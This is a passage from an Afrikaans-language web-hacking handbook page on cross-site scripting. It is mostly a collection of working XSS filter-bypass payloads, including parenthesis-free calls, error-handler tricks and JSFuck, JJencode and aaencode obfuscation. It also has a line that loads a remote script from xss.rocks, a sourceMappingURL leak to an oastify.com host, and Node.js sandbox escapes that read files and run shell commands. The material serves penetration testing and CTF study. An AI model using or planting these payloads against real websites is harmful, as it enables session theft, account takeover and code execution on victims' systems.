eval(`funct${String.fromCodePoint(i)}()`);
log.push(i);
}
catch(e){}
}
console.log(log)
//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279

//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
<img/src/onerror=alert&#65279;(1)>
```
**Javascript binne 'n kommentaar**
```javascript
//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools request to the indicated sourceMappingURL will be send

//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
```
**JavaScript sonder hakies**
````javascript
// By setting location
window.location='javascript:alert\x281\x29'
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name

// Backtips
// Backtips pass the string as an array of lenght 1
alert`1`

// Backtips + Tagged Templates + call/apply
eval`alert\x281\x29` // This won't work as it will just return the passed array
setTimeout`alert\x281\x29`
eval.call`${'alert\x281\x29'}`
eval.apply`${[`alert\x281\x29`]}`
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`

// To pass several arguments you can use
function btt(){
console.log(arguments);
}
btt`${'arg1'}${'arg2'}${'arg3'}`

//It's possible to construct a function and call it
Function`x${'alert(1337)'}x```

// .replace can use regexes and call a function if something is found
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
"a".replace.call`1${/./}${alert}`
// This happened in the previous example
// Change "this" value of call to "1,"
// match anything with regex /./
// call alert with "1"
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead

// Using Reflect.apply to call any function with any argumnets
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
// Using Reflect.set to call set any value to a variable
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.


// valueOf, toString
// These operations are called when the object is used as a primitive
// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
valueOf=alert;window+''
toString=alert;window+''


// Error handler
window.onerror=eval;throw"=alert\x281\x29";
onerror=eval;throw"=alert\x281\x29";
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
{onerror=eval}throw"=alert(1)" //No ";"
onerror=alert //No ";" using new line
throw 1337
// Error handler + Special unicode separators
eval("onerror=\u2028alert\u2029throw 1337");
// Error handler + Comma separator
// The comma separator goes through the list and returns only the last element
var a = (1,2,3,4,5,6) // a = 6
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
throw onerror=alert,1,1,1,1,1,1337
// optional exception variables inside a catch clause.
try{throw onerror=alert}catch{throw 1}


// Has instance symbol
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
````
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)

**Willekeurige funksie (alert) oproep**
````javascript
//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
[]["constructor"]["constructor"]`$${alert()}```
import('data:text/javascript,alert(1)')

//General function executions
`` //Can be use as parenthesis
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>
````
## **DOM kwesbaarhede**

Daar is **JS-kode** wat **onveilig deur 'n aanvaller beheerde data** gebruik soos `location.href`. 'n Aanvaller kan dit misbruik om willekeurige JS-kode uit te voer.\
**As gevolg van die uitbreiding van die verduideliking van** [**DOM kwesbaarhede is dit na hierdie bladsy verskuif**](dom-xss.md)**:**

{% content-ref url="dom-xss.md" %}
[dom-xss.md](dom-xss.md)
{% endcontent-ref %}

Daar sal jy 'n gedetailleerde **verduideliking van wat DOM kwesbaarhede is, hoe hulle uitgelok word, en hoe om hulle te benut** vind.\
Moenie ook vergeet dat **aan die einde van die genoemde pos** jy 'n verduideliking oor [**DOM Clobbering aanvalle**](dom-xss.md#dom-clobbering) kan vind.

## Ander Oorskrydings

### Gestandaardiseerde Unicode

Jy kan nagaan of die **weerspieëlde waardes** op die bediener (of aan die kliëntkant) **unicode genormaliseer** word en hierdie funksionaliteit misbruik om beskermings te omseil. [**Vind 'n voorbeeld hier**](../unicode-injection/#xss-cross-site-scripting).

### PHP FILTER\_VALIDATE\_EMAIL vlag Oorskryding
```javascript
"><svg/onload=confirm(1)>"@x.y
```
### Ruby-On-Rails omseil

As gevolg van **RoR mass assignment** word aanhalings in die HTML ingevoeg en dan word die aanhalingsbeperking omseil en addisionele velde (onfocus) kan binne die tag bygevoeg word.\
Vormvoorbeeld ([van hierdie verslag](https://hackerone.com/reports/709336)), as jy die lading stuur:
```
contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
```
Die paar "Key","Value" sal soos volg teruggevoer word:
```
{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}
```
### Spesiale kombinasies
```markup
<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
```
### XSS met koptekstinjeksie in 'n 302-antwoord

As jy vind dat jy **koptekste kan inspuit in 'n 302 Herlei-antwoord** kan jy probeer om die browser **willekeurige JavaScript te laat uitvoer**. Dit is **nie eenvoudig nie** aangesien moderne webblaaier nie die HTTP-antwoordliggaam interpreteer as die HTTP-antwoordstatuskode 'n 302 is nie, dus is net 'n kruissite-skripsing-lading nutteloos.

In [**hierdie verslag**](https://www.gremwell.com/firefox-xss-302) en [**hierdie een**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) kan jy lees hoe jy verskeie protokolle binne die Ligging-koptekstuk kan toets en sien of enige van hulle die browser toelaat om die XSS-lading binne die liggaam te ondersoek en uit te voer.\
Voorheen bekende protokolle: `mailto://`, `//x:1/`, `ws://`, `wss://`, _leë Ligging-koptekstuk_, `resource://`.

### Slegs Letters, Syfers en Kolletjies

As jy die **terugroep** kan aandui wat javascript gaan **uitvoer** beperk tot daardie karakters. [**Lees hierdie afdeling van hierdie pos**](./#javascript-function) om te vind hoe om van hierdie gedrag misbruik te maak.

### Geldige `<script>` Inhoudstipes vir XSS

(Van [**hier**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) As jy probeer om 'n skrip te laai met 'n **inhoudstipe** soos `application/octet-stream`, sal Chrome die volgende fout gooi:

> Refused to execute script from ‘[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx') because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.

Die enigste **Inhoudstipes** wat Chrome sal ondersteun om 'n **gelaai skrip** uit te voer is diegene binne die konstante **`kSupportedJavascriptTypes`** van [https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third\_party/blink/common/mime\_util/mime\_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third\_party/blink/common/mime\_util/mime\_util.cc)
```c
const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
"application/javascript",
"application/x-ecmascript",
"application/x-javascript",
"text/ecmascript",
"text/javascript",
"text/javascript1.0",
"text/javascript1.1",
"text/javascript1.2",
"text/javascript1.3",
"text/javascript1.4",
"text/javascript1.5",
"text/jscript",
"text/livescript",
"text/x-ecmascript",
"text/x-javascript",
};

```
### Skripsie Tipes vir XSS

(Van [**hier**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) So, watter tipes kan aangedui word om 'n skripsie te laai?
```html
<script type="???"></script>
```
Die antwoord is:

* **module** (standaard, niks om te verduidelik nie)
* [**webbundle**](https://web.dev/web-bundles/): Web Bundles is 'n funksie waar jy 'n klomp data (HTML, CSS, JS...) saam kan verpak in 'n **`.wbn`** lêer.
```html
<script type="webbundle">
{
"source": "https://example.com/dir/subresources.wbn",
"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
}
</script>
The resources are loaded from the source .wbn, not accessed via HTTP
```
* [**importmap**](https://github.com/WICG/import-maps)**:** Laat toe om die invoer sintaksis te verbeter
```html
<script type="importmap">
{
"imports": {
"moment": "/node_modules/moment/src/moment.js",
"lodash": "/node_modules/lodash-es/lodash.js"
}
}
</script>

<!-- With importmap you can do the following -->
<script>
import moment from "moment";
import { partition } from "lodash";
</script>
```
Hierdie gedrag is gebruik in [**hierdie skryfstuk**](https://github.com/zwade/yaca/tree/master/solution) om 'n biblioteek te herken as eval om dit te misbruik en XSS te veroorsaak.

* [**speculationrules**](https://github.com/WICG/nav-speculation)**:** Hierdie funksie is hoofsaaklik om sekere probleme veroorsaak deur vooraf-rendering op te los. Dit werk soos volg:
```html
<script type="speculationrules">
{
"prerender": [
{"source": "list",
"urls": ["/page/2"],
"score": 0.5},
{"source": "document",
"if_href_matches": ["https://*.wikipedia.org/**"],
"if_not_selector_matches": [".restricted-section *"],
"score": 0.1}
]
}
</script>
```
### Web Inhoudstipes vir XSS

(Van [**hier**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Die volgende inhoudstipes kan XSS uitvoer in alle webblaaier:

* text/html
* application/xhtml+xml
* application/xml
* text/xml
* image/svg+xml
* text/plain (?? nie op die lys nie, maar ek dink ek het dit gesien in 'n CTF)
* application/rss+xml (af)
* application/atom+xml (af)

In ander webblaaier kan ander **`Inhoudstipes`** gebruik word om willekeurige JS uit te voer, kyk: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md](https://github.com/BlackFan/content-type-research/blob/master/XSS.md)

### xml Inhoudstipe

As die bladsy 'n text/xml inhoudstipe teruggee, is dit moontlik om 'n namespace aan te dui en willekeurige JS uit te voer:
```xml
<xml>
<text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
</xml>

<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->
```
### Spesiale Vervangingspatrone

Wanneer iets soos **`"some {{template}} data".replace("{{template}}", <user_input>)`** gebruik word. Die aanvaller kan [**spesiale stringvervanginge**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global\_Objects/String/replace#specifying\_a\_string\_as\_the\_replacement) gebruik om te probeer om sekere beskermings te omseil: ``"123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))``

Byvoorbeeld in [**hierdie skryfstuk**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), is dit gebruik om 'n JSON-string binne 'n skripsie te **ontsnapping** en arbitrêre kode uit te voer.

### Chrome Cache na XSS

{% content-ref url="chrome-cache-to-xss.md" %}
[chrome-cache-to-xss.md](chrome-cache-to-xss.md)
{% endcontent-ref %}

### XS Jails Ontsnapping

As jy slegs 'n beperkte stel karakters het om te gebruik, kyk na hierdie ander geldige oplossings vir XSJail-probleme:
```javascript
// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))

// use of with
with(console)log(123)
with(/console.log(1)/)with(this)with(constructor)constructor(source)()
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))

with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))

//Final solution
with(
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
with(this)
with(constructor)
constructor(source)()

// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
```
Indien **alles ongedefinieerd is** voor die uitvoering van onbetroubare kode (soos in [**hierdie uiteensetting**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)), is dit moontlik om nuttige voorwerpe "uit niks" te genereer om die uitvoering van willekeurige onbetroubare kode te misbruik:

* Deur import()
```javascript
// although import "fs" doesn’t work, import('fs') does.
import("fs").then(m=>console.log(m.readFileSync("/flag.txt", "utf8")))
```
* Toegang tot `require` op 'n indirekte manier

[Volgens hierdie](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) word modules deur Node.js binne 'n funksie gewikkel, soos hierdie:
```javascript
(function (exports, require, module, __filename, __dirname) {
// our actual module code
});
```
Daarom, as ons van daardie module **'n ander funksie kan aanroep**, is dit moontlik om `arguments.callee.caller.arguments[1]` van daardie funksie te gebruik om toegang te verkry tot **`require`**:

{% code overflow="wrap" %}
```javascript
(function(){return arguments.callee.caller.arguments[1]("fs").readFileSync("/flag.txt", "utf8")})()
```
{% endcode %}

Op 'n soortgelyke manier as die vorige voorbeeld, is dit moontlik om **fouthanteraars te gebruik** om toegang te verkry tot die **omhulsel** van die module en die **`require`**-funksie te kry:
```javascript
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = ''.constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log('='.repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req('child_process').execSync('id').toString())
}
}
}
trigger()
```
### Verduistering & Gevorderde Oorspoor

* **Verskillende verduisterings op een bladsy:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
* [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs)
* [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
* [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/)
* [http://www.jsfuck.com/](http://www.jsfuck.com)
* Meer gesofistikeerde JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
* [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html)
* [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html)
* [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)
```javascript
//Katana
<script>([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()</script>
```

```javascript
//JJencode
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
```

```javascript
//JSFuck
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
```

```javascript
//aaencode
ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻   //*´∇｀*/ ['_']; o=(ﾟｰﾟ)  =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: '_' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +'_') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ '_')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +'_')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +'_') [c^_^o];(ﾟДﾟ) ['c'] = ((ﾟДﾟ)+'_') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) ['o'] = ((ﾟДﾟ)+'_') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) ['c']+(ﾟДﾟ) ['o']+(ﾟωﾟﾉ +'_')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +'_') [ﾟｰﾟ] + ((ﾟДﾟ) +'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) ['c']+((ﾟДﾟ)+'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) ['o']+((ﾟｰﾟ==3) +'_') [ﾟΘﾟ];(ﾟДﾟ) ['_'] =(o^_^o) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ)=((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+ (ﾟДﾟ) .ﾟДﾟﾉ+((ﾟДﾟ)+'_') [(ﾟｰﾟ) + (ﾟｰﾟ)]+((ﾟｰﾟ==3) +'_') [o^_^o -ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+ (ﾟωﾟﾉ +'_') [ﾟΘﾟ]; (ﾟｰﾟ)+=(ﾟΘﾟ); (ﾟДﾟ)[ﾟεﾟ]='\\'; (ﾟДﾟ).ﾟΘﾟﾉ=(ﾟДﾟ+ ﾟｰﾟ)[o^_^o -(ﾟΘﾟ)];(oﾟｰﾟo)=(ﾟωﾟﾉ +'_')[c^_^o];(ﾟДﾟ) [ﾟoﾟ]='\"';(ﾟДﾟ) ['_'] ( (ﾟДﾟ) ['_'] (ﾟεﾟ+(ﾟДﾟ)[ﾟoﾟ]+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟΘﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟΘﾟ)+ 